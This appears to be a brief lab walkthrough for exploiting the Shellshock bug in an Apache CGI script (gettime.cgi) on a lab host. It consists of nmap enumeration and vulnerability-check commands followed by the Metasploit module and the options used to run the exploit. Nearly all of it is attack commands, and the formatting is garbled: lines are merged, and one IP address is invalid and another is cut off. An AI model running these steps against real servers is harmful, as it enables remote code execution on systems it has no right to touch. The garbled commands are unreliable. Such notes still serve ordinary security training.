Metasploit Exploitation
#Enumeration
nmap -sV 192.173.104.380/tcp open http Apache httpd 2.4.6 ((Unix))Check the website via a browser:
http://192.173.104.3/
View Page Source
http://192.173.104.3/gettime.cgigettime.cgiscript can be utilized as the attack vector

Check if the server is vulnerable to ShellShock
nmap -sV --script=http-shellshock --script-args "http-shellshock.uri=/gettime.cgi" 192.173#Metasploit
search shellshock
use exploit/multi/http/apache_mod_cgi_bash_env_exec
set RHOSTS ip address
set TARGETURI /gettime.cgi
exploit
Last updated